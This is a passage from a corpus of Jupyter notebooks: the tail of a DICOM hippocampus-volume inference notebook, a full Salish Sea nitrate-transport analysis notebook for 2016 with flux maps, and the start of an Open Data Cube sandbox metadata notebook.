is sent to it, including the freshly generated report\n # I want to give it time to save before cleaning it up\n time.sleep(2)\n shutil.rmtree(study_dir, onerror=lambda f, p, e: print(f\"Error deleting: {e[1]}\"))\n\n print(f\"Inference successful on {header['SOPInstanceUID'].value}, out: {pred_label.shape}\",\n f\"volume ant: {pred_volumes['anterior']}, \",\n f\"volume post: {pred_volumes['posterior']}, total volume: {pred_volumes['total']}\")",
"You should supply one command line argument pointing to the routing folder. Exiting.\n"
],
[
"path = '../TestVolumes'\ndcmlist = get_series_for_inference(path)\nvolume, header = load_dicom_volume_as_numpy_from_list(dcmlist)",
"_____no_output_____"
],
[
"volume.shape",
"_____no_output_____"
],
[
"header",
"_____no_output_____"
],
[
"inference_agent = UNetInferenceAgent(device=\"cpu\",parameter_file_path=r\"\")",
"_____no_output_____"
],
[
"pred_label = inference_agent.single_volume_inference_unpadded(np.array(volume), 64)\npred_volumes = get_predicted_volumes(pred_label)",
"_____no_output_____"
],
[
"# Create and save the report\nprint(\"Creating and pushing report...\")\nreport_img = create_report(pred_volumes, header, volume, pred_label)\nreport_img",
"Creating and pushing report...\n"
],
[
"from matplotlib.pyplot import imshow\n%matplotlib inline\nreport_save_path = r\"../out/report.dcm\"\nsave_report_as_dcm(header, report_img, report_save_path)\nimshow(np.asarray(pydicom.dcmread(report_save_path).pixel_array))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
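The HippoVolume.AI record above assembles a DICOM Secondary Capture report (Modality "OT", 8-bit RGB pixels, burned-in annotation) and writes it with `pydicom.filewriter.dcmwrite`. A minimal sketch of reading such a file back and sanity-checking those fields, assuming pydicom is installed; the path and helper name are hypothetical, and the expected values come from the code above:

```python
import pydicom

def check_secondary_capture(path):
    """Read back a Secondary Capture DICOM and print the fields the script sets."""
    ds = pydicom.dcmread(path)
    print("SOPClassUID:", ds.SOPClassUID)        # Secondary Capture: 1.2.840.10008.5.1.4.1.1.7
    print("Modality:", ds.Modality)              # "OT"
    print("PhotometricInterpretation:", ds.PhotometricInterpretation)  # "RGB"
    print("BurnedInAnnotation:", ds.BurnedInAnnotation)                # "YES"
    # For 8-bit RGB the pixel buffer should hold Rows * Columns * 3 bytes
    # (DICOM may append one padding byte to make the length even).
    expected = ds.Rows * ds.Columns * ds.SamplesPerPixel
    print("PixelData bytes:", len(ds.PixelData), "expected ~", expected)
    return ds

# ds = check_secondary_capture("../out/report.dcm")  # hypothetical path
```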
e7093ada3f9ba1a723eaed8b5f50ab61d5d0788f | 152,311 | ipynb | Jupyter Notebook | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | notebooks/results/transportsUpper6-WithArrowsAndV-2016.ipynb | e-olson/NSOGNO3 | 3b5d4f3a6f0353c33c1858f353486ae583023824 | [
"Apache-2.0"
] | null | null | null | 143.284102 | 82,996 | 0.877396 | [
[
[
"### 6 m is mean nitricline depth and just below 10% light level",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\nimport netCDF4 as nc\nimport numpy as np\nimport os\nimport glob\nimport datetime as dt\nfrom salishsea_tools import viz_tools\nfrom matplotlib.ticker import FormatStrFormatter\nimport cmocean\nfrom salishsea_tools import viz_tools, evaltools as et\nimport NorthNut as nn\nimport matplotlib.gridspec as gridspec\nimport pickle\nimport matplotlib as mpl\nimport matplotlib.patheffects as path_effects\nmpl.rc('xtick', labelsize=8)\nmpl.rc('ytick', labelsize=8)\nmpl.rc('legend', fontsize=8)\nmpl.rc('axes', titlesize=8)\nmpl.rc('axes', labelsize=8)\nmpl.rc('figure', titlesize=8)\nmpl.rc('font', size=8)\nmpl.rc('text', usetex=True)\nmpl.rc('text.latex', preamble = r'''\n \\usepackage{txfonts}\n \\usepackage{lmodern}\n ''')\nmpl.rc('font', family='sans-serif', weight='normal', style='normal')\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n%matplotlib inline",
"NorthNut defined variables: ig0,ig1,jg0,jg1,fformat0\nNorthNut defined variables: vmask, vmask0, umask, umask0, tmask, fmask, gdept, gdept_1d, e1t, e2t, e12t, e1f, e2f, e1v, e2u, e3t_1d\nNorthNut defined variables: boxCol, colL, colR, arrowwidth, headwidth, headlength, alen, toff, apw, apk\n"
],
[
"ig0=nn.ig0\nig1=nn.ig1\njg0=nn.jg0\njg1=nn.jg1\ntmask=nn.tmask\numask=nn.umask\nvmask=nn.vmask\numask0=nn.umask0\nvmask0=nn.vmask0\nboxCol=nn.boxCol\ncolL=nn.colL\ncolR=nn.colR",
"_____no_output_____"
],
[
"e12t=nn.e12t",
"_____no_output_____"
],
[
"k=6 #depth presented here\nk1=30 # max depth to do calcs to\nstart=dt.datetime(2016,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included)\nend=dt.datetime(2016,8,20)\nmod_basedir='/data/eolson/results/MEOPAR/SS36runs/linkHC201812/'\nmod_nam_fmt='nowcast'\nmod_flen=1\nsaveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/'\nfver='HC201812'",
"_____no_output_____"
]
],
[
[
"made interval a multiple of a fortnight in attempt to minimize aliasing of tidal cycle:",
"_____no_output_____"
]
],
[
[
"# calc transports: boxes in full model coords\nboxes,boxesS=nn.defboxes(k)",
"volumes: \n(40, 130, 97)\n0 vol: 232834007.16923195 m3\n0 north face area: 0.017903174399708822 km2\n0 south face area: 0.023887115963210383 km2\n0 east face area: 0.0 km2\n0 floor area: 38.10316762126778 km2\n0 floor area: 38.10316762126778 km2\n(40, 130, 97)\n1 vol: 475501033.2591236 m3\n1 north face area: 0.051981996171633744 km2\n1 south face area: 0.0660928789851366 km2\n1 east face area: 0.04443908484818648 km2\n1 floor area: 76.65649877674242 km2\n1 floor area: 76.65649877674242 km2\n(40, 130, 97)\n2 vol: 467855857.4262955 m3\n2 north face area: 0.0660928789851366 km2\n2 south face area: 0.058877382444252245 km2\n2 east face area: 0.044474769797453136 km2\n2 floor area: 76.13281888160705 km2\n2 floor area: 76.13281888160705 km2\n(40, 130, 97)\n3 vol: 475349561.3011287 m3\n3 north face area: 0.0691002936013758 km2\n3 south face area: 0.05633497645148102 km2\n3 east face area: 0.044501987470235926 km2\n3 floor area: 77.68207812856889 km2\n3 floor area: 77.68207812856889 km2\n(40, 130, 97)\n4 vol: 460253674.3391861 m3\n4 north face area: 0.06656271287114815 km2\n4 south face area: 0.05892732464151781 km2\n4 east face area: 0.04453044828517323 km2\n4 floor area: 76.70622481510526 km2\n4 floor area: 76.70622481510526 km2\n(40, 130, 97)\n5 vol: 468674561.80761874 m3\n5 north face area: 0.07171871451380164 km2\n5 south face area: 0.05339660783873324 km2\n5 east face area: 0.04455783029196595 km2\n5 floor area: 76.99707667445263 km2\n5 floor area: 76.99707667445263 km2\n"
],
[
"flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1)\nflistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1)\nflistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1)\nflistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1)\nflistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1)\nflistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1)\nflistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1)\nflistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1)",
"ftype=dian_V, are you sure? (if yes, add to list)\nftype=dian_U, are you sure? (if yes, add to list)\nftype=dian_W, are you sure? (if yes, add to list)\n"
],
[
"NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, Content, Vol, A_N, A_S, A_E, times, boxes = nn.calcTransps(\n start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistC,flistT,recalc=False)",
"_____no_output_____"
],
[
"# vertical transport into 4th box\nnp.shape(BBound[3])",
"_____no_output_____"
]
],
[
[
"NO3_VT v*dx*dz*C = mmol N/s \nNO3_UT u*dy*dz*C = m/s*m2*mmol/m3 = mmol N/s \nVLDFNO3 dC/dt= (F1-F0)/(dx*dy*dz) => F in mmol N/s \nULDFNO3 mmol N/s\nNO3_WT w*dx*dy*C = mmol N/s\nVMIXNO3 ~(Cadz-Cbdz)/dt=mmol/m3*1/s*m = mmol N/m2/s ",
"_____no_output_____"
]
],
[
[
"meanT, meanM = nn.calcFluxFields(flistV,flistU,flistW,flistC,k,saveloc,start,end,fver,recalc=False)",
"_____no_output_____"
],
[
"recalc=False\nfformat0='%Y%m%d'\nsavepathT=saveloc+'saveVolTransp_'+fver+'_k'+str(k)+'_'+start.strftime(fformat0)+\\\n '-'+end.strftime(fformat0)+'.pkl'\n# calc mean velocities upper k\nif recalc==True:\n VT_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n UT_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n for iif in range(0,len(flistGV)):\n with nc.Dataset(flistGV.loc[iif,['paths']].values[0]) as fv, \\\n nc.Dataset(flistGU.loc[iif,['paths']].values[0]) as fu, \\\n nc.Dataset(flistC.loc[iif,['paths']].values[0]) as fc:\n e3te=fc.variables['e3t'][:,:k,jg0:jg1,ig0:ig1]\n VTe=np.sum(0.5*(fv.variables['vomecrty'][:,:k,(jg0-1):(jg1-1),ig0:ig1]+fv.variables['vomecrty'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)\n UTe=np.sum(0.5*(fu.variables['vozocrtx'][:,:k,jg0:jg1,(ig0-1):(ig1-1)]+fu.variables['vozocrtx'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)\n VT_i[(iif*24):(iif*24+24),:,:]=VTe\n UT_i[(iif*24):(iif*24+24),:,:]=UTe\n mVT=np.mean(VT_i,0)\n mUT=np.mean(UT_i,0)\n fformat0='%Y%m%d'\n pickle.dump({'mVT':mVT,'mUT':mUT},open(savepathT,'wb'))\nelse:\n data=pickle.load(open(savepathT,'rb'))\n mVT=data['mVT']\n mUT=data['mUT']",
"_____no_output_____"
],
[
"recalc=False\nsavepathV=saveloc+'saveVel_'+fver+'_k'+str(k)+'_'+start.strftime(fformat0)+\\\n '-'+end.strftime(fformat0)+'.pkl'\n# calc mean velocities upper k\nif recalc==True:\n V_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n U_i=np.zeros((len(flistGV)*24,jg1-jg0,ig1-ig0))\n for iif in range(0,len(flistGV)):\n with nc.Dataset(flistGV.loc[iif,['paths']].values[0]) as fv, \\\n nc.Dataset(flistGU.loc[iif,['paths']].values[0]) as fu, \\\n nc.Dataset(flistC.loc[iif,['paths']].values[0]) as fc:\n e3te=fc.variables['e3t'][:,:k,jg0:jg1,ig0:ig1]\n Ve=np.sum(0.5*(fv.variables['vomecrty'][:,:k,(jg0-1):(jg1-1),ig0:ig1]+fv.variables['vomecrty'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)/np.sum(e3te,1)\n Ue=np.sum(0.5*(fu.variables['vozocrtx'][:,:k,jg0:jg1,(ig0-1):(ig1-1)]+fu.variables['vozocrtx'][:,:k,jg0:jg1,ig0:ig1])*e3te,1)/np.sum(e3te,1)\n V_i[(iif*24):(iif*24+24),:,:]=Ve\n U_i[(iif*24):(iif*24+24),:,:]=Ue\n mV=np.mean(V_i,0)\n mU=np.mean(U_i,0)\n fformat0='%Y%m%d'\n pickle.dump({'mV':mV,'mU':mU},open(savepathV,'wb'))\nelse:\n data=pickle.load(open(savepathV,'rb'))\n mV=data['mV']\n mU=data['mU']",
"_____no_output_____"
],
[
"mapCol=(0.67, 0.8, 0.64) # rgb\ncmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None)\ncmb.set_bad(mapCol)\ncmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None)\ncmc.set_bad(mapCol)",
"_____no_output_____"
],
[
"for el in BBound.keys():\n print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3)",
"0 106.68687299579294\n1 67.73938469636559\n2 -91.42046017658305\n3 61.87491918843877\n4 2.664297754196007\n5 41.0880141843993\n"
]
],
[
[
"#### Sum of vertical mixing and transport NO3 supply to region in boxes:",
"_____no_output_____"
]
],
[
[
"np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\\\n BBound[1][:,:k]+BBoundMix[1][:,:k]+\\\n BBound[2][:,:k]+BBoundMix[2][:,:k]+\\\n BBound[3][:,:k]+BBoundMix[3][:,:k]+\\\n BBound[4][:,:k]+BBoundMix[4][:,:k]+\\\n BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3",
"_____no_output_____"
]
],
[
[
"##### Divide by area:",
"_____no_output_____"
]
],
[
[
"ABoxes=nn.boxAreas(k)",
"volumes: \n(40, 130, 97)\n0 vol: 232834007.16923195 m3\n0 north face area: 0.017903174399708822 km2\n0 south face area: 0.023887115963210383 km2\n0 east face area: 0.0 km2\n0 floor area: 38.10316762126778 km2\n0 floor area: 38.10316762126778 km2\n(40, 130, 97)\n1 vol: 475501033.2591236 m3\n1 north face area: 0.051981996171633744 km2\n1 south face area: 0.0660928789851366 km2\n1 east face area: 0.04443908484818648 km2\n1 floor area: 76.65649877674242 km2\n1 floor area: 76.65649877674242 km2\n(40, 130, 97)\n2 vol: 467855857.4262955 m3\n2 north face area: 0.0660928789851366 km2\n2 south face area: 0.058877382444252245 km2\n2 east face area: 0.044474769797453136 km2\n2 floor area: 76.13281888160705 km2\n2 floor area: 76.13281888160705 km2\n(40, 130, 97)\n3 vol: 475349561.3011287 m3\n3 north face area: 0.0691002936013758 km2\n3 south face area: 0.05633497645148102 km2\n3 east face area: 0.044501987470235926 km2\n3 floor area: 77.68207812856889 km2\n3 floor area: 77.68207812856889 km2\n(40, 130, 97)\n4 vol: 460253674.3391861 m3\n4 north face area: 0.06656271287114815 km2\n4 south face area: 0.05892732464151781 km2\n4 east face area: 0.04453044828517323 km2\n4 floor area: 76.70622481510526 km2\n4 floor area: 76.70622481510526 km2\n(40, 130, 97)\n5 vol: 468674561.80761874 m3\n5 north face area: 0.07171871451380164 km2\n5 south face area: 0.05339660783873324 km2\n5 east face area: 0.04455783029196595 km2\n5 floor area: 76.99707667445263 km2\n5 floor area: 76.99707667445263 km2\n"
],
[
"# units are umol/m2/s\nAsum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5]\nnp.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\\\n BBound[1][:,:k]+BBoundMix[1][:,:k]+\\\n BBound[2][:,:k]+BBoundMix[2][:,:k]+\\\n BBound[3][:,:k]+BBoundMix[3][:,:k]+\\\n BBound[4][:,:k]+BBoundMix[4][:,:k]+\\\n BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3",
"_____no_output_____"
],
[
"NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \\\n nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k)",
"units now mol/s\n0\n9.947443564164551 -35.36731480236245 0.0\n-0.0046223353959914375 58.76628758233049 0.0\n1\n-22.620420567817963 2.780912185800212 -4.152702975741998\n-0.003609745963443457 26.68507539825033 0.01654148305007088\n2\n-48.21118237454796 -38.53446231146092 -5.828905089609929\n0.020290641983787206 10.629639434866348 0.022566290148021577\n3\n-15.233859569173294 16.33758039802773 0.9471348725929473\n0.010119958992957822 3.7240321789910458 0.023437269926385562\n4\n-23.81655244968974 -3.282389513837408 -0.7069941837524848\n5.932767951691176e-06 2.8153398651808828 0.01571380403468441\n5\n-15.806420454157982 9.432231135160077 3.7878209498426956\n0.01883030837182633 3.2020627328984146 0.011968896304912286\n"
],
[
"BBoundC",
"_____no_output_____"
],
[
"mask=dict()\nmask['V']=vmask0\nmask['U']=umask0\nmask['W']=tmask[k,:,:]",
"_____no_output_____"
],
[
"# NBoundC:\nfor el in NBoundC:\n print(el,NBoundC[el])",
"0 9.947443564164551\n1 -22.620420567817963\n2 -48.21118237454796\n3 -15.233859569173294\n4 -23.81655244968974\n5 -15.806420454157982\n"
],
[
"# SBoundC:\nfor el in SBoundC:\n print(el,SBoundC[el])",
"0 -10.705207468296186\n1 -48.21118237454796\n2 -17.121361889061724\n3 -23.95515532538627\n4 -14.44589312680721\n5 -14.68694807880987\n"
],
[
"-22.620420567817963+10.705207468296186",
"_____no_output_____"
],
[
"-17.121361889061724+15.233859569173294",
"_____no_output_____"
],
[
"-23.95515532538627+23.81655244968974",
"_____no_output_____"
],
[
"-15.806420454157982+14.44589312680721",
"_____no_output_____"
],
[
"# EBoundC:\nfor el in EBoundC:\n print(el,EBoundC[el])",
"0 0.0\n1 -4.152702975741998\n2 -5.828905089609929\n3 0.9471348725929473\n4 -0.7069941837524848\n5 3.7878209498426956\n"
],
[
"# BBoundC:\nfor el in BBoundC:\n print(el,BBoundC[el])",
"0 -35.36731480236245\n1 2.780912185800212\n2 -38.53446231146092\n3 16.33758039802773\n4 -3.282389513837408\n5 9.432231135160077\n"
],
[
"# BBoundMIXC:\nfor el in BBoundMixC:\n print(el,BBoundMixC[el])",
"0 58.76628758233049\n1 26.68507539825033\n2 10.629639434866348\n3 3.7240321789910458\n4 2.8153398651808828\n5 3.2020627328984146\n"
],
[
"fig=plt.figure(figsize=(7.5,5.2))\ngs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92,\n width_ratios=[1,1],height_ratios=[1,1])\nax=list()\ncbax=list()\nfor jx in range(0,2):\n if jx==0:\n gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],\n width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1)\n gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],\n width_ratios=[10,10,1],wspace=.1)\n elif jx==1:\n gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],\n width_ratios=[10,10,1],wspace=.1)\n gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],\n width_ratios=[10,10,1],wspace=.1)\n ax1=fig.add_subplot(gsi[0])\n ax1.get_xaxis().set_visible(False)\n ax1.get_yaxis().set_visible(False)\n viz_tools.set_aspect(ax1)\n ax2=fig.add_subplot(gsi[1])\n ax2.get_xaxis().set_visible(False)\n ax2.get_yaxis().set_visible(False)\n viz_tools.set_aspect(ax2)\n ax3=fig.add_subplot(gsi[2])\n ax.append(ax1,)\n ax.append(ax2,)\n cbax.append(ax3,)\n\nax7=fig.add_subplot(gsl[0])\nviz_tools.set_aspect(ax7)\nax9=fig.add_subplot(gsl[2])\nax.append(ax3,)\nax.append(ax3,)\nax.append(ax7,)\ncbax.append(ax9,)\ncbax.append(ax9,)\n\nv1=3000\nm=ax[0].pcolormesh(np.ma.masked_where(mask['V']==0,1000*(meanT['V']+meanM['V'])),cmap=cmb,vmin=-1*v1,vmax=v1)\nax[0].set_title('Northward NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection + Mixing')\nm=ax[1].pcolormesh(np.ma.masked_where(mask['U']==0,1000*(meanT['U']+meanM['U'])),cmap=cmb,vmin=-1*v1,vmax=v1)\ncb0=fig.colorbar(m,cax=cbax[0])\nax[1].set_title('Eastward NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection + Mixing')\nv2=15\nm=ax[2].pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanT['W'])),cmap=cmc,vmin=-1*v2,vmax=v2)\nax[2].set_title('Vertical NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nAdvection')\nm=ax[3].pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanM['W'])),cmap=cmc,vmin=-1*v2,vmax=v2)\ncb1=fig.colorbar(m,cax=cbax[1])\nax[3].set_title('Vertical NO$_3$\\nFlux ($\\muup$mol N m$^{-2}$ s$^{-1}$)\\nMixing')\n\nnn.drawboxesV(ax[0],boxes,boxCol)\nnn.drawboxesU(ax[1],boxes,boxCol)\nnn.drawboxesT(ax[2],boxes,boxCol)\nnn.drawboxesT(ax[3],boxes,boxCol)\nfor iax in ax:\n iax.set_facecolor(mapCol)\nax[0].set_xlim(-13,ig1-ig0)\nax[1].set_xlim(0,ig1-ig0-.5)\nax[2].set_xlim(-13,ig1-ig0)\nax[3].set_xlim(-13,ig1-ig0)\n\nax[0].set_ylim(.5,jg1-jg0-.5)\nax[1].set_ylim(1,jg1-jg0)\nax[2].set_ylim(1,jg1-jg0)\nax[3].set_ylim(1,jg1-jg0)\n\nnn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC)\nnn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC)\nnn.annotWTTranspUpper(ax[2],boxes,BBoundC)\nnn.annotWMTranspUpper(ax[3],boxes,BBoundMixC)\n\nx1=ax[1].get_position()\nxc1=cbax[0].get_position()\ncbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3]))\nx2=ax[3].get_position()\nxc2=cbax[1].get_position()\ncbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3]))\n\nfig.canvas.draw()\nfor icb in (cb0,cb1):\n test=icb.ax.yaxis.get_ticklabels()\n test[0].set_text('$\\leq$'+(test[0].get_text()))\n test[-1].set_text('$\\geq$'+(test[-1].get_text()))\n icb.ax.yaxis.set_ticklabels(test)\n\ncm0=cmocean.cm.thermal\ncm0.set_bad(mapCol)\ncm1=cmocean.cm.dense_r\ncm1.set_bad(mapCol)\n\n\n\niax=ax[6]\nii0=6\n#log scale arrow magnitude without ruining vector 
directions:\nclim=(0,3.5)\nsubN=9\nsh=np.shape(mUT)#mUT\nshx,shy=np.meshgrid(np.arange(ii0,sh[1],subN),np.arange(ii0,sh[0],subN))\n#log scale arrow magnitude without ruining vector directions:\nugrd=mUT\nvgrd=mVT\nmesh=iax.contourf(np.ma.masked_where(tmask[0,:,:]==0,\n np.sqrt(ugrd[:,:]**2+vgrd[:,:]**2)),\n np.linspace(clim[0],clim[1],200),vmin=clim[0],vmax=clim[1],cmap=cm1,extend='max')\nmag0=np.sqrt(ugrd**2+vgrd**2)\nugrd2=np.ma.masked_where(tmask[0,:,:]==0,ugrd)#np.where(mag0==0,0,ugrd*mag2/mag0))\nvgrd2=np.ma.masked_where(tmask[0,:,:]==0,vgrd)#np.where(mag0==0,0,vgrd*mag2/mag0))\nQ = iax.quiver(shx,shy,ugrd2[ii0::subN, ii0::subN], vgrd2[ii0::subN, ii0::subN],\n pivot='mid', units='inches',width=.03,color='w',scale=7,alpha=.7)#scale=4000\niax.set_title('Vertically Integrated\\nVelocity (m$^2$ s$^{-1}$)')\niax.set_xticks([],[]);\niax.set_yticks([],[]);\ncb=fig.colorbar(mesh,cax=cbax[3],ticks=np.linspace(clim[0],clim[1],6))\nbb=cbax[3].get_position()\ncbax[3].set_position([bb.x0-.205,bb.y0,bb.width,bb.height])\n#p0=ax1.get_position()\n\n\nfig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.png',dpi=300)\nfig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.pdf',dpi=300)\nprint('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k'+str(k)+'_2016.pdf')",
"/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports_k6_2016.pdf\n"
]
],
[
[
"### look at total upward N transports",
"_____no_output_____"
]
],
[
[
"fig,ax=plt.subplots(1,1)\nax.pcolormesh(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])),\n cmap=cmc,vmin=-1,vmax=1)\nnn.drawboxesV(ax,boxes,boxCol)",
"_____no_output_____"
],
[
"## total net N transport in moles N / s\nnp.sum(np.sum(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])*e12t),1),0)*1e-6\n",
"_____no_output_____"
],
[
"## total net N transport in moles N / s\nnp.sum(np.sum(np.ma.masked_where(mask['W'][:-3,:]==0,1000*(meanT['W'][:-3,:]+meanM['W'][:-3,:])*e12t[:-3,:]),1),0)*1e-6\n",
"_____no_output_____"
]
],
[
[
"##### divide both by area:",
"_____no_output_____"
]
],
[
[
"# whole range, umol/m2/s\nnp.sum(np.sum(np.ma.masked_where(mask['W']==0,1000*(meanT['W']+meanM['W'])*e12t),1),0)/np.sum(np.sum(e12t*mask['W']))",
"_____no_output_____"
],
[
"# cut off 3, umol/m2/s\nnp.sum(np.sum(np.ma.masked_where(mask['W'][:-3,:]==0,1000*(meanT['W'][:-3,:]+meanM['W'][:-3,:])*e12t[:-3,:]),1),0)/np.sum(np.sum(e12t[:-3,:]*mask['W'][:-3,:]))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"raw",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
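The nitrate-transport record above keeps track of units such as `NO3_VT = v*dx*dz*C` in mmol N/s, then reports per-area supplies in umol N m^-2 s^-1 (the `/Asum*1e3` cell). A small worked example of that unit bookkeeping; every number here is made up for illustration and is not taken from the model output:

```python
# Illustrative flux bookkeeping: v [m/s] * dx [m] * dz [m] * C [mmol N/m^3] -> mmol N/s
v = 0.1      # northward velocity, m/s (made up)
dx = 500.0   # cell width, m (made up)
dz = 1.0     # cell thickness, m (made up)
C = 20.0     # NO3 concentration, mmol N/m^3 (made up)

flux = v * dx * dz * C        # mmol N/s through one cell face
print(f"face flux: {flux} mmol N/s")

# Dividing a flux (mmol N/s) by a box area (m^2) and multiplying by 1e3
# gives the per-area supply in umol N m^-2 s^-1, as in the notebook:
area = 76.7e6                 # box floor area, m^2 (~76.7 km^2, made up)
supply = flux / area * 1e3    # umol N m^-2 s^-1
print(f"per-area supply: {supply:.2e} umol N m^-2 s^-1")
```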
e7093c1f55a35a0904e257bd0e60e8c9cd74345e | 285,912 | ipynb | Jupyter Notebook | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | dcal/Metadata Document.ipynb | LSgeo/odc-sandbox-notebooks | 3b1aebd8914c847a835f9f71362208e5f5d24b03 | [
"Apache-2.0"
] | null | null | null | 132.121996 | 188,176 | 0.735954 | [
[
[
"# Sandbox Metadata Document\n\nThis document aims to provide an overview of the different data sets available in the Open Data Cube Sandbox. It will provide details on which products are available, what regions are indexed for each product, and the time series available within that extent.\n\nFor information on how to get started with the Datacube, please see the read_me_first.ipynb available [here](https://sandbox.test.frontiersi.io/user/sandbox/notebooks/Read_me_first.ipynb).\n\n* [Datacube Information](#datacube) \n * [ALOS 2](#alos2) \n * [Landsat 5](#ls5) \n * [Landsat 7](#ls7) \n * [Landsat 8](#ls8) \n * [Sentinel 1](#s1)\n* [Product coverage illustration](#map)\n \n* [System Information](#system)",
"_____no_output_____"
],
[
"<a class=\"anchor\" id=\"datacube\"></a>\n## Datacube Information",
"_____no_output_____"
]
],
[
[
"from IPython.core.display import display, HTML\nimport pandas as pd\n\nimport datacube\ndc = datacube.Datacube()\ndc.list_products()",
"_____no_output_____"
]
],
[
[
